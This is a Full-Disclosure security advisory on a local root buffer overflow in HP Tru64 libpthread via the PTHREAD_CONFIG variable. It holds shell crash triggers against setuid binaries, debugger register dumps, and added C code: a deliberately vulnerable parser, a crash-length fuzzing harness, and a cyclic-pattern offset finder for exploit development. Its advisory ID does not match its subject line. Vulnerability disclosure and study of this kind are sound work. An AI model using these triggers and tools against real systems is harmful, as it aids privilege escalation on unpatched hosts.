
[Full-disclosure] [NETRAGARD-20061109 SECURITY ADVISORY] [HP Tru64 libpthread buffer overflow][http://www.netragard.com]



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

******************** Netragard, L.L.C. Advisory ********************

                     Strategic Reconnaissance Team

              ------------------------------------------------
              http://www.netragard.com -- "We make I.T. Safe."
        

[Advisory Information]
- ----------------------------------------------------------------------
Advisory ID             : NETRAGARD-20060810
Advisory Contact        : Adriel T. Desautels
Credit                  : Undisclosed
Product Name            : libpthread
Product Version         : 5.1b
Vendor Name             : Hewlett-Packard
Type of Vulnerability   : Local Root Compromise
Effort                  : Very Difficult
Operating System        : Tru64
Other                   : Buffer Overflow

[Product Description]
- ----------------------------------------------------------------------
The pthread library (libpthread) provides interfaces for developing
multi-threaded applications.

[Technical Summary]
- ----------------------------------------------------------------------
libpthread suffers from a buffer overflow vulnerability which may
enable a local attacker to execute arbitrary code on the system. The
vulnerability may be triggered by placing a specially crafted buffer
in the PTHREAD_CONFIG environment variable.

[Technical Details]
- ----------------------------------------------------------------------
libpthread reads the PTHREAD_CONFIG environment variable from the
environment of any process linked against it. It may be possible to
exploit libpthread on HP's Tru64 by placing a specially crafted buffer
in that variable. The details below do not contain the specially
crafted buffer. Because programs that are commonly installed setuid
root, such as /usr/sbin/sendmail, are linked against libpthread, an
unprivileged local user controls the overflowed buffer inside a
privileged process; that is what makes this a local root issue rather
than a simple crash. Exploitation of this specific vulnerability is
very difficult.

##################################################################
#
#       Insert 273 A's (0x41) into the PTHREAD_CONFIG variable
#
##################################################################

OSF1 tru64 V5.1 2650 alpha
bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 273'`
bash-3.00# newaliases
Segmentation fault (core dumped)

##################################################################
#
#       Insert 274 A's (0x41) into the PTHREAD_CONFIG variable
#
##################################################################

bash-3.00# export PTHREAD_CONFIG=`perl -e 'print "A"x 274'`
bash-3.00# newaliases
Unaligned access pid=15750 <newaliases> va=0x11fff00a4 pc=0x3ff805c8bf8
ra=0x3ff805c8bf8 inst=0xa4290040
Unaligned access pid=15750 <newaliases> va=0x11fff00bc pc=0x3ff805c8bfc
ra=0x3ff805c8bf8 inst=0xa4490058
Unaligned access pid=15750 <newaliases> va=0x11fff008c pc=0x3ff805c8c48
ra=0x3ff805c8bf8 inst=0xa5090028
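The two runs above are a manual length sweep: 273 bytes segfaults, 274 bytes produces unaligned accesses, which already tells you the copied value is landing on saved registers in the caller's frame. The program below is an added example written for this page, not libpthread source (which is not public) and not Netragard's proof of concept. It shows the bug class in a hypothetical parser (`vuln_read_config`, an unbounded strcpy of an environment value into a fixed stack buffer of an assumed `CONFIG_MAX` bytes), the hardened form that rejects oversized input instead of truncating it (`safe_read_config`), and a fork-based harness (`run_child`, `first_crashing_length`) that generalises the 273/274-byte experiment: each length is tried in a child process and the parent reports the first one that dies by a signal. All of these names and the 256-byte buffer size are assumptions; the real libpthread buffer size is not stated anywhere in the advisory.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Assumed size of the hypothetical parser's stack buffer. The real
 * libpthread size is unknown; 273/274 is just where its crash was seen. */
#define CONFIG_MAX 256

/* 'Before': the bug class the advisory describes. An attacker-controlled
 * environment value is copied into a fixed-size stack buffer with no
 * length check. Deliberately vulnerable; kept out of line so the overflow
 * happens in its own frame. */
__attribute__((noinline)) int vuln_read_config(const char *value)
{
    char keyword[CONFIG_MAX];
    strcpy(keyword, value);                 /* overflows once strlen(value) >= CONFIG_MAX */
    return (int)(unsigned char)keyword[0];  /* keeps the buffer live */
}

/* Bounded length: scans at most 'limit' bytes, so the check itself can
 * never run past the end of an unterminated or oversized value. */
static size_t bounded_len(const char *s, size_t limit)
{
    size_t n = 0;
    while (n < limit && s[n] != '\0')
        n++;
    return n;
}

/* 'After': reject oversized input outright instead of truncating it, so a
 * hostile PTHREAD_CONFIG can only produce a "keyword is not valid" error. */
int safe_read_config(const char *value, char *dst, size_t dstsz)
{
    if (value == NULL || dst == NULL || dstsz == 0)
        return -1;
    size_t n = bounded_len(value, dstsz);
    if (n >= dstsz)
        return -1;                          /* too long: refuse it */
    memcpy(dst, value, n + 1);              /* n + 1 <= dstsz, includes the NUL */
    return 0;
}

/* Constructed input: 'len' bytes of 'A' (0x41) plus a NUL; caller frees. */
static char *make_as(size_t len)
{
    char *v = malloc(len + 1);
    if (v != NULL) {
        memset(v, 'A', len);
        v[len] = '\0';
    }
    return v;
}

/* Run the hardened parser on 'len' bytes of 'A' and return its verdict. */
int check_length(size_t len)
{
    char dst[CONFIG_MAX];
    char *v = make_as(len);
    if (v == NULL)
        return -1;
    int rc = safe_read_config(v, dst, sizeof dst);
    free(v);
    return rc;
}

/* Feed 'len' bytes of 'A' to the vulnerable parser in a child process.
 * Returns 0 if the child exited cleanly, the signal number if it was
 * killed (SIGSEGV, SIGBUS, SIGABRT from a stack protector), -1 on error. */
int run_child(size_t len)
{
    char *v = make_as(len);
    if (v == NULL)
        return -1;
    fflush(NULL);                           /* don't duplicate stdio buffers into the child */
    pid_t pid = fork();
    if (pid == 0) {
        vuln_read_config(v);
        _exit(0);
    }
    free(v);
    int status;
    if (pid < 0 || waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFSIGNALED(status) ? WTERMSIG(status) : 0;
}

/* Sweep lengths lo..hi (the advisory's 273 -> 274 step, generalised) and
 * return the first length that kills the child, or -1 if none does. */
int first_crashing_length(size_t lo, size_t hi)
{
    for (size_t len = lo; len <= hi; len++) {
        int sig = run_child(len);
        if (sig > 0) {
            printf("len=%zu: child killed by signal %d\n", len, sig);
            return (int)len;
        }
    }
    return -1;
}

int main(void)
{
    printf("hardened parser, 255 bytes: %d (accepted)\n", check_length(255));
    printf("hardened parser, 300 bytes: %d (rejected)\n", check_length(300));
    printf("first crashing length for the vulnerable parser: %d\n",
           first_crashing_length(CONFIG_MAX - 8, CONFIG_MAX + 64));
    return 0;
}
```

The harness isolates each attempt in a child so one crash does not stop the sweep, and it distinguishes a signal death from a clean exit with `WIFSIGNALED`, which is the same information the shell gave above as "Segmentation fault (core dumped)". Against a real target you would `setenv("PTHREAD_CONFIG", v, 1)` and `execv` the binary in the child instead of calling the parser directly.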

##################################################################
#
#       Run newaliases in gdb with the -q flag.
#
##################################################################

bash-3.00# gdb /tmp/newaliases -q
(no debugging symbols found)...(gdb) r
Starting program: /tmp/newaliases
(no debugging symbols found)...(no debugging symbols found)...(no
debugging symbols found)...
(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so

##################################################################
#
#       Execute a back trace (bt) within gdb
#
##################################################################

(gdb) bt
#0  0x3ff805c8bf8 in __putString () from /usr/shlib/libpthread.so
#1  0x3ff805c8a78 in __putFormatEol () from /usr/shlib/libpthread.so
#2  0x3ff805bc4f8 in __utlOptManage () from /usr/shlib/libpthread.so
warning: Hit heuristic-fence-post without finding
warning: enclosing function for address 0x4141414141414141
This warning occurs if you are debugging a function without any symbols
(for example, in a stripped executable).  In that case, you may wish to
increase the size of the search with the `set heuristic-fence-post'
command.

Otherwise, you told GDB there was a function where there isn't one, or
(more likely) you have encountered a bug in GDB.

##################################################################
#
#       Execute Info Registers (i r) within gdb
#
##################################################################

(gdb) i r
v0             0x226    550
t0             0x11fff9b3e      4831812414
t1             0x0      0
t2             0x2      2
t3             0x0      0
t4             0x3ffc0081a00    4396973300224
t5             0x40     64
t6             0x7fffffe6       2147483622
t7             0x19     25
s0             0x4141414141414141       4702111234474983745
s1             0x11fff9c90      4831812752
s2             0x11fff9c88      4831812744
s3             0x0      0
s4             0x0      0
s5             0x11fff9ad8      4831812312
fp             0x1      1
a0             0xbf     191
a1             0x11fff9918      4831811864
a2             0x11fff96b0      4831811248
a3             0x11fff9b34      4831812404
a4             0x0      0
a5             0x11fff9b30      4831812400
t8             0x11fff9931      4831811889
t9             0x62     98
t10            0x49     73
t11            0x1      1
ra             0x3ff805c8bf8    4395905092600
t12            0x3ff801c1380    4395900867456
at             0x41416469       1094804585
gp             0x3ffc01c0170    4396974604656
sp             0x11fff98b0      4831811760
zero           0x0      0
fpcr           0x0      0
pc             0x3ff805c8bf8    4395905092600
vfp            0x11fff9900      4831811840

(gdb) frame 2
(gdb) i r
v0             0x226    550
t0             0x11fff9b3e      4831812414
t1             0x0      0
t2             0x2      2
t3             0x0      0
t4             0x3ffc0081a00    4396973300224
t5             0x11fff9a50      4831812176
t6             0x7fffffe6       2147483622
t7             0x19     25
s0             0x1      1
s1             0x11fff9c90      4831812752
s2             0x11fff9c88      4831812744
s3             0x0      0
s4             0x0      0
s5             0x11fff9ad8      4831812312
fp             0x1      1

##################################################################
#
#       The following registers, a0, a1, a2, a3, a4, a5, have been
#       overwritten with A's (0x41).
#
##################################################################

a0             0x4141414141414141       4702111234474983745
a1             0x4141414141414141       4702111234474983745
a2             0x4141414141414141       4702111234474983745
a3             0x4141414141414141       4702111234474983745
a4             0x4141414141414141       4702111234474983745
a5             0x4141414141414141       4702111234474983745
t8             0x11fff9931      4831811889
t9             0x62     98
t10            0x49     73
t11            0x1      1
ra             0x3ff805bc4f8    4395905041656
t12            0x3ff801c1380    4395900867456
at             0x41416469       1094804585
gp             0x3ffc01c0170    4396974604656
sp             0x11fff9a80      4831812224
zero           0x0      0
fpcr           0x0      0
pc             0x3ff805bc4f8    4395905041656
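The register dumps above show s0 in frame 0 and a0 through a5 in frame 2 holding 0x4141414141414141, but a uniform run of A's cannot tell you which bytes of PTHREAD_CONFIG ended up in which register. The usual refinement, added here as an example that is not part of the advisory, is to send a cyclic pattern instead: every 8-byte window of the pattern is unique, so a clobbered register value maps back to one exact offset. Alpha under Tru64 is little-endian, so the register's low byte is the first byte in memory and the search needle has to be serialised low byte first. `pattern_create`, `pattern_offset`, `load_le64`, `demo_offset` and `demo_offset_for` are names chosen for this example; the simulated register value is constructed from the pattern itself rather than taken from a real crash.

```c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>

/* Fill out[0..len) with the classic cyclic pattern "Aa0Aa1Aa2...Ab0..." and
 * NUL-terminate it (out needs len + 1 bytes). Every 8-byte window is unique
 * within the first 26*26*10*3 = 20280 bytes, because the three alphabets
 * (upper, lower, digit) fix the alignment and each triple occurs once. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                const char trip[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = trip[i];
            }
    out[n] = '\0';
    return n;
}

/* Given a 64-bit register value printed by gdb or dbx after the crash,
 * return the offset in the pattern of the 8 bytes it was loaded from, or
 * -1 if that value did not come from the pattern (as 0x4141414141414141
 * would not). Little-endian: low byte of the register is the first byte. */
long pattern_offset(const char *pat, size_t len, uint64_t reg)
{
    unsigned char needle[8];
    for (int i = 0; i < 8; i++)
        needle[i] = (unsigned char)(reg >> (8 * i));
    for (size_t off = 0; off + 8 <= len; off++)
        if (memcmp(pat + off, needle, 8) == 0)
            return (long)off;
    return -1;
}

/* Simulate the crashed process's own load: an 8-byte little-endian read
 * from the pattern, the way s0 above came to hold 0x4141414141414141. */
uint64_t load_le64(const char *p)
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--)
        v = (v << 8) | (unsigned char)p[i];
    return v;
}

/* Demo: build a pattern of 'len' bytes, pretend a register was loaded from
 * offset 'off', and recover that offset from the register value alone. */
long demo_offset(size_t len, size_t off)
{
    char *pat = malloc(len + 1);
    if (pat == NULL || off + 8 > len) { free(pat); return -1; }
    size_t n = pattern_create(pat, len);
    long found = pattern_offset(pat, n, load_le64(pat + off));
    free(pat);
    return found;
}

/* Demo: look up a raw register value against a pattern of 'len' bytes. */
long demo_offset_for(size_t len, uint64_t reg)
{
    char *pat = malloc(len + 1);
    if (pat == NULL) return -1;
    size_t n = pattern_create(pat, len);
    long found = pattern_offset(pat, n, reg);
    free(pat);
    return found;
}

int main(void)
{
    char pat[301];
    pattern_create(pat, 300);             /* same length range as the 273-byte test above */
    printf("export PTHREAD_CONFIG=%s\n", pat);
    uint64_t s0 = load_le64(pat + 100);   /* constructed: pretend gdb showed this in s0 */
    printf("s0 = 0x%016llx -> offset %ld\n", (unsigned long long)s0,
           pattern_offset(pat, 300, s0));
    printf("0x4141414141414141 -> offset %ld (all-A's input gives no offset)\n",
           pattern_offset(pat, 300, 0x4141414141414141ULL));
    return 0;
}
```

With the pattern in PTHREAD_CONFIG, the s0 value at the `ldq t0, 64(s0)` fault and the a0..a5 values in frame 2 each resolve to a byte offset, which is what you need to know before any of the "very difficult" work of placing a useful address there can start.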

##################################################################
#
#       Other binaries which are linked against libpthread.so
#       will also segfault when the PTHREAD_CONFIG variable
#       is set to a large string of A's. The following is
#       a list of some of those binaries
#
##################################################################

/usr/sbin/mailq
/usr/sbin/sendmail
/usr/sbin/sendmail.v8.11.1
/usr/sbin/smtpd
/usr/sbin/collect
/usr/dt/bin/mailcv

##################################################################
#
#       Sendmail Example. Loading sendmail core file with
#       the tru64 debugger.
#
##################################################################

bash-3.00# dbx ./sendmail core
dbx version 5.1
Type 'help' for help.
Core file created by program "sendmail"

warning: ./sendmail has no symbol table -- very little is
supported without it

signal Segmentation fault at >*[__putString, 0x3ff805c8bf8]     ldq
t0, 64(s0)
(dbx) where
>  0 __putString(0x0, 0x0, 0x11fffbad8, 0x1, 0x11fffb918)
[0x3ff805c8bf8]
 1 __putFormatEol(0x4141414141414141, 0x4141414141414141,
0x4141414141414141, 0x4141414141414141, 0x4141414141414141)
[0x3ff805c8a74]
 2 __utlOptManage(0x30002800000, 0x26000, 0x3ff805c09c4,
0x3ffc01b8098, 0x3ff805c0a14) [0x3ff805bc4f4]

##################################################################
#
#       Older versions are also vulnerable...
#
##################################################################

tru64.netragard> uname -a
OSF1 tru64.netragard V5.0 910 alpha
tru64.netragard> PTHREAD_CONFIG=`perl -e 'print "A"x 272'`
tru64.netragard> export PTHREAD_CONFIG
tru64.netragard> /usr/dt/bin/mailcv

%PTHREAD_CONFIG keyword
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA"

is not valid
Memory fault

Other binaries affected on 5.0:
/usr/bin/ladebug

[Proof of Concept]
- ----------------------------------------------------------------------
Undisclosed

[Vendor Status]
- ----------------------------------------------------------------------
Vendor contacted; patch released.


[About Netragard]
- ----------------------------------------------------------------------
Netragard offers specialized application, network security, and
managed security services which enable its clients to take a proactive
security stance. Each of our services is driven by security
professionals who specialize in specific areas of Information
Security. This specialized focus differentiates Netragard from the
competition by enabling Netragard to produce deliverables which are
the product of skilled security professionals and not the product of
automated tools and scripts.

   [ For more information please visit http://www.netragard.com ]

[Disclaimer]
- ---------------------http://www.netragard.com-------------------------
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
dangerous security hole. This advisory is not an attempt to solicit
business.

http://www.netragard.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (Darwin)

iD8DBQFFU/c7Qwbn1P9Iaa0RAs+GAJ494WKCsHlPEFjsL1Zy+hQtpsGVRQCfSdUL
eUqI/l8ML/I2/rKIDHvZ/k8=
=h9zy
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/